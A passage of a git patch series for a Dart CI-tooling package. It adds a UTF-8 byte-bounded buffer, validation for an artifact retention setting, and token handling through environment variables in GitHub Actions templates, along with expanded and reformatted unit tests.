  /// Appends [data], charging its UTF-8 byte cost against [maxBytes].
  ///
  /// On overflow: writes the largest prefix of [data] that still leaves room
  /// for [truncationSuffix], then the suffix (possibly itself truncated), and
  /// permanently marks the buffer truncated.
  void append(String data) {
    if (_isTruncated || data.isEmpty) {
      return;
    }
    if (maxBytes <= 0) {
      _isTruncated = true;
      return;
    }

    final dataBytes = utf8.encode(data).length;
    if (_byteLength + dataBytes <= maxBytes) {
      // Fast path: the whole chunk fits within the remaining budget.
      _buffer.write(data);
      _byteLength += dataBytes;
      return;
    }

    final available = maxBytes - _byteLength;
    if (available <= 0) {
      _isTruncated = true;
      return;
    }

    // Reserve room for the suffix first; leftover budget goes to the data.
    final suffixBytes = utf8.encode(truncationSuffix).length;
    final reservedForSuffix = suffixBytes < available ? suffixBytes : available;
    final dataBudget = available - reservedForSuffix;

    if (dataBudget > 0) {
      final prefix = truncateToUtf8Bytes(data, dataBudget);
      if (prefix.isNotEmpty) {
        _buffer.write(prefix);
        _byteLength += utf8.encode(prefix).length;
      }
    }

    final remaining = maxBytes - _byteLength;
    if (remaining > 0) {
      final suffixPrefix = truncateToUtf8Bytes(truncationSuffix, remaining);
      if (suffixPrefix.isNotEmpty) {
        _buffer.write(suffixPrefix);
        _byteLength += utf8.encode(suffixPrefix).length;
      }
    }

    _isTruncated = true;
  }

  /// Returns the longest prefix of [input] whose UTF-8 encoding is at most
  /// [maxBytes] bytes, never splitting a code point mid-sequence.
  static String truncateToUtf8Bytes(String input, int maxBytes) {
    if (maxBytes <= 0 || input.isEmpty) return '';
    if (utf8.encode(input).length <= maxBytes) return input;

    final out = StringBuffer();
    var used = 0;
    for (final rune in input.runes) {
      final chunk = String.fromCharCode(rune);
      final chunkBytes = utf8.encode(chunk).length;
      if (used + chunkBytes > maxBytes) break;
      out.write(chunk);
      used += chunkBytes;
    }
    return out.toString();
  }
}
+ 'artifact_retention_days': _resolveArtifactRetentionDays(ciConfig['artifact_retention_days']), // Feature flags 'proto': features['proto'] == true, @@ -298,6 +298,15 @@ class WorkflowGenerator { return '120'; } + static String _resolveArtifactRetentionDays(dynamic raw) { + if (raw is int && raw >= 1 && raw <= 90) return '$raw'; + if (raw is String) { + final parsed = int.tryParse(raw.trim()); + if (parsed != null && parsed >= 1 && parsed <= 90) return '$parsed'; + } + return '7'; + } + /// Shared filter: extracts valid, normalized web test paths from config. static List _filteredWebTestPaths(Map ciConfig) { final webTestConfig = _getWebTestConfig(ciConfig); @@ -461,6 +470,30 @@ class WorkflowGenerator { } } } + final artifactRetention = ciConfig['artifact_retention_days']; + if (artifactRetention != null && artifactRetention is! int && artifactRetention is! String) { + errors.add('ci.artifact_retention_days must be a number or string, got ${artifactRetention.runtimeType}'); + } else if (artifactRetention is int) { + if (artifactRetention < 1 || artifactRetention > 90) { + errors.add('ci.artifact_retention_days must be between 1 and 90, got $artifactRetention'); + } + } else if (artifactRetention is String) { + final trimmed = artifactRetention.trim(); + if (trimmed.isEmpty) { + errors.add('ci.artifact_retention_days string must not be empty or whitespace-only'); + } else if (trimmed != artifactRetention) { + errors.add('ci.artifact_retention_days must not have leading/trailing whitespace'); + } else if (artifactRetention.contains(RegExp(r'[\r\n\t\x00-\x1f]'))) { + errors.add('ci.artifact_retention_days must not contain newlines or control characters'); + } else if (!RegExp(r'^\d+$').hasMatch(artifactRetention)) { + errors.add('ci.artifact_retention_days string must be digits only (e.g. 
7), got "$artifactRetention"'); + } else { + final parsed = int.parse(artifactRetention); + if (parsed < 1 || parsed > 90) { + errors.add('ci.artifact_retention_days must be between 1 and 90, got $artifactRetention'); + } + } + } final platforms = ciConfig['platforms']; if (platforms != null) { if (platforms is! List) { @@ -677,6 +710,7 @@ class WorkflowGenerator { Logger.info(' Dart SDK: ${ciConfig['dart_sdk']}'); Logger.info(' PAT secret: ${ciConfig['personal_access_token_secret']}'); Logger.info(' Platforms: ${platforms.join(', ')}'); + Logger.info(' Artifact retention days: ${_resolveArtifactRetentionDays(ciConfig['artifact_retention_days'])}'); final enabledFeatures = features.entries.where((e) => e.value == true).map((e) => e.key).toList(); if (enabledFeatures.isNotEmpty) { diff --git a/templates/config.json b/templates/config.json index 3da8593..fbff096 100644 --- a/templates/config.json +++ b/templates/config.json @@ -65,6 +65,8 @@ "ci": { "dart_sdk": "3.9.2", "line_length": 120, + "_comment_artifact_retention_days": "Optional: retention for uploaded test artifacts in days (1-90).", + "artifact_retention_days": 7, "personal_access_token_secret": "GITHUB_TOKEN", "features": { "proto": false, diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index be4dd4d..75cfddc 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -108,13 +108,14 @@ jobs: # ── shared:git-config ── keep in sync with multi_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global 
url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with multi_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -263,13 +264,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global 
url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -377,13 +379,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -488,13 +491,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform / multi_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - 
git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform / multi_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -557,12 +561,14 @@ jobs: <%/web_test_has_paths%> - name: Upload web test artifacts on failure - if: failure() && hashFiles('**/test-results/**') != '' + if: failure() uses: actions/upload-artifact@v4 with: name: web-test-artifacts path: | **/test-results/ + ${{ runner.temp }}/test-results/ + if-no-files-found: ignore retention-days: <%artifact_retention_days%> <%/web_test%> diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart index 79047f6..9727e86 100644 --- a/test/cli_utils_test.dart +++ b/test/cli_utils_test.dart @@ -9,6 +9,7 @@ import 'package:runtime_ci_tooling/src/cli/utils/repo_utils.dart'; import 'package:runtime_ci_tooling/src/cli/utils/step_summary.dart'; import 'package:runtime_ci_tooling/src/cli/utils/sub_package_utils.dart'; import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/utf8_bounded_buffer.dart'; bool _canCreateSymlink() { final tempDir = Directory.systemTemp.createTempSync('symlink_probe_'); @@ -46,10 +47,7 @@ void main() 
{ }); test('returns default path when TEST_LOG_DIR is unset', () { - final resolved = RepoUtils.resolveTestLogDir( - repoRoot, - environment: const {}, - ); + final resolved = RepoUtils.resolveTestLogDir(repoRoot, environment: const {}); expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); }); @@ -73,10 +71,8 @@ void main() { test('throws when TEST_LOG_DIR is relative', () { expect( - () => RepoUtils.resolveTestLogDir( - repoRoot, - environment: const {'TEST_LOG_DIR': 'relative/path'}, - ), + () => + RepoUtils.resolveTestLogDir(repoRoot, environment: const {'TEST_LOG_DIR': 'relative/path'}), throwsA(isA()), ); }); @@ -85,10 +81,7 @@ void main() { final runnerTemp = p.join(repoRoot, 'runner-temp'); final outside = p.join(repoRoot, 'outside', 'logs'); expect( - () => RepoUtils.resolveTestLogDir( - repoRoot, - environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, - ), + () => RepoUtils.resolveTestLogDir(repoRoot, environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}), throwsA(isA()), ); }); @@ -102,6 +95,17 @@ void main() { ); expect(resolved, equals(inside)); }); + + test('throws when RUNNER_TEMP contains control characters', () { + final inside = p.join(repoRoot, 'runner-temp', 'logs'); + expect( + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: {'RUNNER_TEMP': '/tmp/runner\nbad', 'TEST_LOG_DIR': inside}, + ), + throwsA(isA()), + ); + }); }); group('RepoUtils filesystem safety', () { @@ -137,35 +141,19 @@ void main() { expect(File(filePath).readAsStringSync(), equals('hello world')); }); - test( - 'ensureSafeDirectory rejects symlink-backed directories', - skip: !symlinksSupported, - () { - final targetDir = Directory(p.join(tempDir.path, 'target')) - ..createSync(recursive: true); - final linkDirPath = p.join(tempDir.path, 'linked'); - Link(linkDirPath).createSync(targetDir.path); - expect( - () => RepoUtils.ensureSafeDirectory(linkDirPath), - throwsA(isA()), - ); - }, - ); - - test( - 'writeFileSafely 
rejects symlink file targets', - skip: !symlinksSupported, - () { - final targetFile = File(p.join(tempDir.path, 'target.txt')) - ..writeAsStringSync('base'); - final linkPath = p.join(tempDir.path, 'linked.txt'); - Link(linkPath).createSync(targetFile.path); - expect( - () => RepoUtils.writeFileSafely(linkPath, 'new content'), - throwsA(isA()), - ); - }, - ); + test('ensureSafeDirectory rejects symlink-backed directories', skip: !symlinksSupported, () { + final targetDir = Directory(p.join(tempDir.path, 'target'))..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect(() => RepoUtils.ensureSafeDirectory(linkDirPath), throwsA(isA())); + }); + + test('writeFileSafely rejects symlink file targets', skip: !symlinksSupported, () { + final targetFile = File(p.join(tempDir.path, 'target.txt'))..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect(() => RepoUtils.writeFileSafely(linkPath, 'new content'), throwsA(isA())); + }); }); group('TestResultsUtil.parseTestResultsJson', () { @@ -213,21 +201,16 @@ void main() { expect(results.failures, isEmpty); }); - test( - 'returns unparsed results when file has valid JSON but no structured events', - () { - final jsonPath = p.join(tempDir.path, 'no_events.json'); - File( - jsonPath, - ).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }, - ); + test('returns unparsed results when file has valid JSON but no structured events', () { + final jsonPath = p.join(tempDir.path, 'no_events.json'); + File(jsonPath).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); + final results = 
TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }); test('parses pass/fail/skipped counts and failure details', () { final jsonPath = p.join(tempDir.path, 'results.json'); @@ -276,6 +259,24 @@ void main() { expect(results.failures.length, lessThanOrEqualTo(50)); }); + test('counts testDone with result \"error\" as a failure', () { + final jsonPath = p.join(tempDir.path, 'error_result.json'); + File(jsonPath).writeAsStringSync( + [ + '{"type":"testStart","test":{"id":1,"name":"errored"},"time":100}', + '{"type":"error","testID":1,"error":"boom","stackTrace":"trace"}', + '{"type":"testDone","testID":1,"result":"error","hidden":false,"skipped":false,"time":140}', + '{"type":"done","time":140}', + ].join('\n'), + ); + + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.failed, equals(1)); + expect(results.failures, hasLength(1)); + expect(results.failures.first.name, equals('errored')); + }); + test('ignores malformed JSON lines and hidden test entries', () { final jsonPath = p.join(tempDir.path, 'results.json'); File(jsonPath).writeAsStringSync( @@ -339,12 +340,7 @@ void main() { }); group('TestResultsUtil.writeTestJobSummary', () { - TestResults _parsed({ - required int passed, - required int failed, - required int skipped, - int durationMs = 500, - }) { + TestResults _parsed({required int passed, required int failed, required int skipped, int durationMs = 500}) { final results = TestResults() ..parsed = true ..passed = passed @@ -354,50 +350,39 @@ void main() { return results; } - test( - 'emits NOTE when parsed results are successful and exit code is 0', - () { - String? 
summary; - final results = _parsed(passed: 3, failed: 0, skipped: 1); - - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'linux-x64', - writeSummary: (markdown) => summary = markdown, - ); + test('emits NOTE when parsed results are successful and exit code is 0', () { + String? summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux-x64')); - expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('All 4 tests passed')); - }, - ); - - test( - 'emits CAUTION when exit code is non-zero even if failed count is zero', - () { - String? summary; - final results = _parsed(passed: 2, failed: 0, skipped: 0); - - TestResultsUtil.writeTestJobSummary( - results, - 1, - platformId: 'linux ', - writeSummary: (markdown) => summary = markdown, - ); + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux <x64>')); - expect(summary!, contains('> [!CAUTION]')); - expect( - summary!, - contains( - 'Tests exited with code 1 despite no structured test failures.', - ), - ); - }, - ); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }); + + test('emits CAUTION when exit code is non-zero even if failed count is zero', () { + String? 
summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect(summary!, contains('Tests exited with code 1 despite no structured test failures.')); + }); test('emits CAUTION for unparsed results with non-zero exit code', () { String? summary; @@ -412,12 +397,7 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!CAUTION]')); - expect( - summary!, - contains( - 'Tests failed (exit code 7) — no structured results available.', - ), - ); + expect(summary!, contains('Tests failed (exit code 7) — no structured results available.')); }); test('emits NOTE for unparsed results with zero exit code', () { @@ -433,25 +413,14 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!NOTE]')); - expect( - summary!, - contains( - 'Tests passed (exit code 0) — no structured results available.', - ), - ); + expect(summary!, contains('Tests passed (exit code 0) — no structured results available.')); }); test('emits CAUTION when parsed results contain failures', () { String? summary; final results = _parsed(passed: 1, failed: 1, skipped: 0); results.failures.add( - TestFailure( - name: 'failing test', - error: 'boom', - stackTrace: 'trace', - printOutput: '', - durationMs: 12, - ), + TestFailure(name: 'failing test', error: 'boom', stackTrace: 'trace', printOutput: '', durationMs: 12), ); TestResultsUtil.writeTestJobSummary( @@ -491,16 +460,11 @@ void main() { ); expect(summary, isNotNull); - expect( - summary!, - contains( - '_...and 5 more failures. See test logs artifact for full details._', - ), - ); + expect(summary!, contains('_...and 5 more failures. 
See test logs artifact for full details._')); expect(summary!, isNot(contains('failing test 24'))); }); - test('escapes unsafe HTML in failure content (closing tags, etc.)', () { + test('keeps failure content readable inside fenced blocks', () { String? summary; final results = _parsed(passed: 0, failed: 1, skipped: 0); results.failures.add( @@ -521,10 +485,9 @@ void main() { ); expect(summary, isNotNull); - expect(summary!, contains('</details>')); - expect(summary!, contains('<script>')); - expect(summary!, contains('<summary>')); - expect(summary!, isNot(contains(''))); + expect(summary!, contains('```')); + expect(summary!, contains('Error: ')); + expect(summary!, contains('fake')); }); test('handles adversarial backtick content in failure output', () { @@ -533,7 +496,7 @@ void main() { results.failures.add( TestFailure( name: 'backtick test', - error: '```' * 10 + 'content' + '```' * 10, + error: '`' * 140 + 'content' + '`' * 140, stackTrace: '', printOutput: '', durationMs: 0, @@ -551,7 +514,34 @@ void main() { expect(summary!, contains('### Failed Tests')); expect(summary!, contains('backtick test')); // Fence should be longer than content's backticks; output should be valid - expect(summary!.split('```').length, greaterThan(2)); + expect(summary!.contains('`' * 141), isTrue); + }); + }); + + group('Utf8BoundedBuffer', () { + test('appends full content when under byte limit', () { + final buffer = Utf8BoundedBuffer(maxBytes: 20, truncationSuffix: '...[truncated]'); + buffer.append('hello'); + buffer.append(' world'); + expect(buffer.isTruncated, isFalse); + expect(buffer.toString(), equals('hello world')); + expect(buffer.byteLength, equals(11)); + }); + + test('truncates at UTF-8 rune boundaries and appends suffix', () { + final buffer = Utf8BoundedBuffer(maxBytes: 10, truncationSuffix: '...'); + buffer.append('aaaaaa'); + buffer.append('語語語'); // each 語 is 3 bytes + expect(buffer.isTruncated, isTrue); + expect(buffer.toString(), equals('aaaaaa...')); + 
expect(buffer.byteLength, equals(9)); + }); + + test('never exceeds maxBytes even when suffix is longer than remaining budget', () { + final buffer = Utf8BoundedBuffer(maxBytes: 4, truncationSuffix: '...[truncated]'); + buffer.append('abcdefgh'); + expect(buffer.isTruncated, isTrue); + expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); }); }); @@ -569,10 +559,7 @@ void main() { File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); - StepSummary.write( - '語', - environment: {'GITHUB_STEP_SUMMARY': summaryPath}, - ); + StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); // Should skip append (would exceed); file size unchanged expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); } finally { @@ -608,9 +595,7 @@ void main() { void _writeConfig(Map ci) { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync(json.encode({'ci': ci})); + File('${configDir.path}/config.json').writeAsStringSync(json.encode({'ci': ci})); } test('returns empty when no sub_packages', () { @@ -700,51 +685,35 @@ void main() { }); group('CiProcessRunner.exec', () { - test('fatal path exits with process exit code after flushing stdout/stderr', - () async { - final scriptPath = p.join( - p.current, - 'test', - 'scripts', - 'fatal_exit_probe.dart', - ); - final result = Process.runSync( - Platform.resolvedExecutable, - ['run', scriptPath], - runInShell: false, - ); + test('fatal path exits with process exit code after flushing stdout/stderr', () async { + final scriptPath = p.join(p.current, 'test', 'scripts', 'fatal_exit_probe.dart'); + final result = Process.runSync(Platform.resolvedExecutable, ['run', scriptPath], runInShell: false); final expectedCode = Platform.isWindows ? 
7 : 1; - expect(result.exitCode, equals(expectedCode), - reason: 'fatal exec should exit with failing command exit code'); + expect(result.exitCode, equals(expectedCode), reason: 'fatal exec should exit with failing command exit code'); }); }); group('CiProcessRunner.runWithTimeout', () { test('completes normally when process finishes within timeout', () async { - final result = await CiProcessRunner.runWithTimeout( - Platform.resolvedExecutable, - ['--version'], - timeout: const Duration(seconds: 10), - ); + final result = await CiProcessRunner.runWithTimeout(Platform.resolvedExecutable, [ + '--version', + ], timeout: const Duration(seconds: 10)); expect(result.exitCode, equals(0)); expect(result.stdout, contains('Dart')); }); - test( - 'returns timeout result and kills process when timeout exceeded', - () async { - final executable = Platform.isWindows ? 'ping' : 'sleep'; - final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; - final result = await CiProcessRunner.runWithTimeout( - executable, - args, - timeout: const Duration(milliseconds: 500), - timeoutExitCode: 124, - timeoutMessage: 'Timed out', - ); - expect(result.exitCode, equals(124)); - expect(result.stderr, equals('Timed out')); - }, - ); + test('returns timeout result and kills process when timeout exceeded', () async { + final executable = Platform.isWindows ? 'ping' : 'sleep'; + final args = Platform.isWindows ? 
['127.0.0.1', '-n', '60'] : ['60']; + final result = await CiProcessRunner.runWithTimeout( + executable, + args, + timeout: const Duration(milliseconds: 500), + timeoutExitCode: 124, + timeoutMessage: 'Timed out', + ); + expect(result.exitCode, equals(124)); + expect(result.stderr, equals('Timed out')); + }); }); } diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index a18f086..f91f04c 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -336,6 +336,11 @@ void main() { expect(errors, anyElement(contains('digits only'))); }); + test('string line_length empty string produces error', () { + final errors = WorkflowGenerator.validate(_validConfig(lineLength: '')); + expect(errors, anyElement(contains('must not be empty'))); + }); + test('string line_length "+120" produces error (digits only, no sign)', () { final errors = WorkflowGenerator.validate(_validConfig(lineLength: '+120')); expect(errors, anyElement(contains('digits only'))); @@ -377,6 +382,33 @@ void main() { }); }); + // ---- artifact_retention_days ---- + group('artifact_retention_days', () { + test('int artifact_retention_days passes', () { + final config = _validConfig()..['artifact_retention_days'] = 14; + final errors = WorkflowGenerator.validate(config); + expect(errors.where((e) => e.contains('artifact_retention_days')), isEmpty); + }); + + test('string artifact_retention_days passes', () { + final config = _validConfig()..['artifact_retention_days'] = '30'; + final errors = WorkflowGenerator.validate(config); + expect(errors.where((e) => e.contains('artifact_retention_days')), isEmpty); + }); + + test('artifact_retention_days empty string produces error', () { + final config = _validConfig()..['artifact_retention_days'] = ''; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('artifact_retention_days string must not be empty'))); + }); + + test('artifact_retention_days above 90 produces 
error', () { + final config = _validConfig()..['artifact_retention_days'] = 91; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('between 1 and 90'))); + }); + }); + // ---- sub_packages (Issue #9 validation) ---- group('sub_packages', () { test('non-list sub_packages produces error', () { @@ -545,6 +577,17 @@ void main() { expect(errors, anyElement(contains('whitespace'))); }); + test('sub_packages name with leading/trailing whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': ' foo ', 'path': 'packages/foo'}, + ], + ), + ); + expect(errors, anyElement(contains('name must not have leading/trailing whitespace'))); + }); + test('sub_packages path with trailing tab triggers whitespace error', () { // Trailing \t means trimmed != value, so the whitespace check fires first. final errors = WorkflowGenerator.validate( @@ -1537,6 +1580,24 @@ void main() { expect(rendered, contains(specialContent)); }); + test('duplicate user section markers in existing content: last matched section wins', () { + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); + final base = gen.render(); + final existing = + ''' +$base +# --- BEGIN USER: pre-test --- + - run: echo first +# --- END USER: pre-test --- +# --- BEGIN USER: pre-test --- + - run: echo second +# --- END USER: pre-test --- +'''; + final rendered = gen.render(existingContent: existing); + expect(rendered, contains('echo second')); + expect(rendered, isNot(contains('echo first'))); + }); + test('null existingContent produces same output as no existingContent', () { final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); final withoutExisting = gen.render(); @@ -1568,6 +1629,23 @@ void main() { expect(needs, contains('auto-format')); }); + test('format_check renders repo-wide dart format command (.)', () { + final gen = WorkflowGenerator( + 
ciConfig: _minimalValidConfig(featureOverrides: {'format_check': true}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('run: dart format --line-length 120 .')); + }); + + test('git-config steps use env indirection (GH_PAT) instead of inline secrets in run', () { + final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(), toolingVersion: '0.0.0-test'); + final rendered = gen.render(); + expect(rendered, contains('GH_PAT: \${{ secrets.')); + expect(rendered, contains('echo "::add-mask::\${GH_PAT}"')); + expect(rendered, isNot(contains('TOKEN="\${{ secrets.'))); + }); + test('web_test without format_check: web-test needs omits auto-format', () { final gen = WorkflowGenerator(ciConfig: _minimalValidConfig(webTest: true), toolingVersion: '0.0.0-test'); final rendered = gen.render(); @@ -1631,6 +1709,21 @@ void main() { expect(needs, contains('analyze-and-test')); }); + test('single-platform uses explicit PLATFORM_ID from single_platform_id context', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}, platforms: ['windows-x64']), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final job = parsed['jobs']['analyze-and-test'] as YamlMap; + final steps = (job['steps'] as YamlList).toList(); + final testStep = steps.firstWhere((s) => s is YamlMap && s['name'] == 'Test', orElse: () => null); + expect(testStep, isNotNull); + final env = (testStep as YamlMap)['env'] as YamlMap; + expect(env['PLATFORM_ID'], equals('windows-x64')); + }); + test('secrets render in web-test job env block', () { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig(webTest: true)..['secrets'] = {'API_KEY': 'MY_SECRET'}, @@ -1762,6 +1855,15 @@ void main() { expect(rendered, contains('Policy: test artifact retention-days = 7')); }); + test('artifact retention-days can be overridden via 
ci.artifact_retention_days', () { + final ci = _minimalValidConfig(featureOverrides: {'managed_test': true}); + ci['artifact_retention_days'] = 14; + final gen = WorkflowGenerator(ciConfig: ci, toolingVersion: '0.0.0-test'); + final rendered = gen.render(); + expect(rendered, contains('retention-days: 14')); + expect(rendered, contains('Policy: test artifact retention-days = 14')); + }); + test('Windows pub-cache path uses format for Dart default (%LOCALAPPDATA%\\Pub\\Cache)', () { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig(platforms: ['windows']), From 5a98b33d78e71ddbe3a2414428e5d6f14a2f7671 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 22:22:11 -0500 Subject: [PATCH 14/16] fix: stream test result parsing and harden test command exits Switch test-results parsing to async line-by-line streaming to avoid loading large NDJSON files into memory. Add injectable exit handling and timeout controls in TestCommand so failure paths are testable, and expand tests/docs to cover the async parser contract. --- docs/cli/API_REFERENCE.md | 2 +- lib/src/cli/commands/test_command.dart | 25 +- lib/src/cli/utils/test_results_util.dart | 183 ++++++------ test/cli_utils_test.dart | 352 +++++++++++++++-------- test/test_command_test.dart | 218 ++++++++++---- 5 files changed, 511 insertions(+), 269 deletions(-) diff --git a/docs/cli/API_REFERENCE.md b/docs/cli/API_REFERENCE.md index 8b463b3..a008acf 100644 --- a/docs/cli/API_REFERENCE.md +++ 